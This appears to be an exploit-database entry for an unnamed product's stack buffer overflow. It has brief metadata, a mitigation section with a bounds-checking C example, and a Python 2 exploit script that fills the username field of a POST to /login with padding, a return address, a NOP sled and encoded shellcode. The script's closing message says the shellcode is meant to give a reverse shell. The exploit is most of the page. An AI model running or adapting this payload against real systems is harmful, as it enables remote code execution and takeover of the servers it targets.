Vendor: N/A
By: Anonymous
CVSS: 7.5 (HIGH)
Stack Buffer Overflow
CWE: 120
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2020

Stack Buffer Overflow Exploit

This is a stack buffer overflow exploit used to gain access to a system by sending malicious code to a vulnerable application. The malicious code is sent as an input buffer inside an HTTP POST request; in the script below it is carried in the username field of a request to /login. The buffer contains shellcode, which the vulnerable application then executes.

Mitigation:

The best way to mitigate stack buffer overflow vulnerabilities is to use secure coding practices such as input validation, boundary checks, and proper memory management.
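
The boundary check described above, sketched for the kind of form field this request targets. This is an added example, not code from the affected product (which the page does not name); USERNAME_MAX, form_get_field and handle_login are hypothetical names, and the 64-byte limit is an assumed policy value.

```c
#include <stddef.h>
#include <string.h>

#define USERNAME_MAX 64 /* assumed limit; the real buffer size is not on the page */

/* Copy the raw value of `key` from an application/x-www-form-urlencoded
 * body into out[out_len]. Returns the value length, -1 if the key is
 * missing, -2 if the value does not fit (reject the request, never truncate
 * silently). The value is not URL-decoded here; decoding only shrinks it. */
int form_get_field(const char *body, const char *key, char *out, size_t out_len)
{
    size_t klen = strlen(key);
    const char *p = body;

    if (out_len == 0)
        return -2;
    out[0] = '\0';
    while (p && *p) {
        const char *end = strchr(p, '&');
        size_t pair_len = end ? (size_t)(end - p) : strlen(p);

        if (pair_len > klen && strncmp(p, key, klen) == 0 && p[klen] == '=') {
            size_t vlen = pair_len - klen - 1;
            if (vlen >= out_len) /* boundary check before any copy */
                return -2;
            memcpy(out, p + klen + 1, vlen);
            out[vlen] = '\0';
            return (int)vlen;
        }
        p = end ? end + 1 : NULL;
    }
    return -1;
}

/* Hypothetical login handler: 0 = continue to authentication,
 * -1 = reject the request (for example with HTTP 400). */
int handle_login(const char *body)
{
    char username[USERNAME_MAX + 1];

    /* The unsafe pattern this replaces is an unbounded strcpy()/sprintf()
     * of the field into a fixed-size stack buffer such as `username`. */
    if (form_get_field(body, "username", username, sizeof username) < 0)
        return -1;
    return 0;
}
```

Compiler and platform hardening (stack protectors, non-executable stack, ASLR) complements the check but does not replace it.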
Source

Exploit-DB raw data:

#!/usr/bin/python
import socket

try:
	print "\nSending evil buffer..."
 
	shellcode = ("\xba\x31\x13\x39\xe4\xdb\xd3\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
	"\x52\x31\x56\x12\x03\x56\x12\x83\xdf\xef\xdb\x11\xe3\xf8\x9e"
	"\xda\x1b\xf9\xfe\x53\xfe\xc8\x3e\x07\x8b\x7b\x8f\x43\xd9\x77"
	"\x64\x01\xc9\x0c\x08\x8e\xfe\xa5\xa7\xe8\x31\x35\x9b\xc9\x50"
	"\xb5\xe6\x1d\xb2\x84\x28\x50\xb3\xc1\x55\x99\xe1\x9a\x12\x0c"
	"\x15\xae\x6f\x8d\x9e\xfc\x7e\x95\x43\xb4\x81\xb4\xd2\xce\xdb"
	"\x16\xd5\x03\x50\x1f\xcd\x40\x5d\xe9\x66\xb2\x29\xe8\xae\x8a"
	"\xd2\x47\x8f\x22\x21\x99\xc8\x85\xda\xec\x20\xf6\x67\xf7\xf7"
	"\x84\xb3\x72\xe3\x2f\x37\x24\xcf\xce\x94\xb3\x84\xdd\x51\xb7"
	"\xc2\xc1\x64\x14\x79\xfd\xed\x9b\xad\x77\xb5\xbf\x69\xd3\x6d"
	"\xa1\x28\xb9\xc0\xde\x2a\x62\xbc\x7a\x21\x8f\xa9\xf6\x68\xd8"
	"\x1e\x3b\x92\x18\x09\x4c\xe1\x2a\x96\xe6\x6d\x07\x5f\x21\x6a"
	"\x68\x4a\x95\xe4\x97\x75\xe6\x2d\x5c\x21\xb6\x45\x75\x4a\x5d"
	"\x95\x7a\x9f\xf2\xc5\xd4\x70\xb3\xb5\x94\x20\x5b\xdf\x1a\x1e"
	"\x7b\xe0\xf0\x37\x16\x1b\x93\xf7\x4f\x93\xde\x90\x8d\xd3\x21"
	"\xda\x1b\x35\x4b\x0c\x4a\xee\xe4\xb5\xd7\x64\x94\x3a\xc2\x01"
	"\x96\xb1\xe1\xf6\x59\x32\x8f\xe4\x0e\xb2\xda\x56\x98\xcd\xf0"
	"\xfe\x46\x5f\x9f\xfe\x01\x7c\x08\xa9\x46\xb2\x41\x3f\x7b\xed"
	"\xfb\x5d\x86\x6b\xc3\xe5\x5d\x48\xca\xe4\x10\xf4\xe8\xf6\xec"
	"\xf5\xb4\xa2\xa0\xa3\x62\x1c\x07\x1a\xc5\xf6\xd1\xf1\x8f\x9e"
	"\xa4\x39\x10\xd8\xa8\x17\xe6\x04\x18\xce\xbf\x3b\x95\x86\x37"
	"\x44\xcb\x36\xb7\x9f\x4f\x56\x5a\x35\xba\xff\xc3\xdc\x07\x62"
	"\xf4\x0b\x4b\x9b\x77\xb9\x34\x58\x67\xc8\x31\x24\x2f\x21\x48"
	"\x35\xda\x45\xff\x36\xcf")

	inputBuffer = "A" * 780 + "\x83\x0c\x09\x10" + "C" * 4 + "\x90" * 10 + shellcode
	content="username="+inputBuffer+"&password=A"
	 
	buffer="POST /login HTTP/1.1\r\n"
	buffer+="Host: 192.168.176.139\r\n"
	buffer+="User-Agent: Mozilla/5.0 (X11; Linux_86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
	buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
	buffer+="Accept-Language: en-US,en;q=0.5\r\n"
	buffer+="Referer: http://192.168.176.139/login\r\n"
	buffer+="Connection: close\r\n"
	buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
	buffer+="Content-Length: "+str(len(content))+"\r\n"
	buffer+="\r\n"
	buffer+=content
	 
	s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
	s.connect(("192.168.176.139", 80))
	s.send(buffer)
	s.close()
	print "\nDone did you get a reverse shell?"
except: 
	print "\nCould not connect!"